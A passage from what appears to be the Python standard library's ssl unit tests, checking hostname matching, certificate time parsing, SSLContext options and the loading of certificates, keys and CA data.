# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
        # no special treatment for the special value:
        # 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
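    # Note on the bit-twiddling above: SSLContext.options is a plain OR-able
    # bit mask mirroring OpenSSL's SSL_CTX_set_options().  Bits can always be
    # set, but clearing them requires SSL_CTX_clear_options(), which is not
    # available on every OpenSSL build -- hence the can_clear_options()
    # branch.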
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
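    # To summarize the password forms accepted by load_cert_chain(), as
    # exercised above: str, bytes, bytearray, or a zero-argument callable
    # returning one of those.  A minimal sketch, with hypothetical file
    # names:
    #
    #     ctx.load_cert_chain("cert.pem", "key.pem",
    #                         password=lambda: "correct horse battery")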
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
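    # Note: cadata accepts either a str of concatenated PEM certificates
    # (junk between the PEM blocks is ignored) or bytes of concatenated DER
    # certificates; certificates already present in the store are silently
    # deduplicated, as the x509_ca counters above demonstrate.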
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
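    # The default argument above (cycle=ctx) deliberately creates a
    # reference cycle context -> callback -> context; asserting that the
    # weakref dies after gc.collect() shows the cycle is collectable rather
    # than pinned by the C-level callback slot.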
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
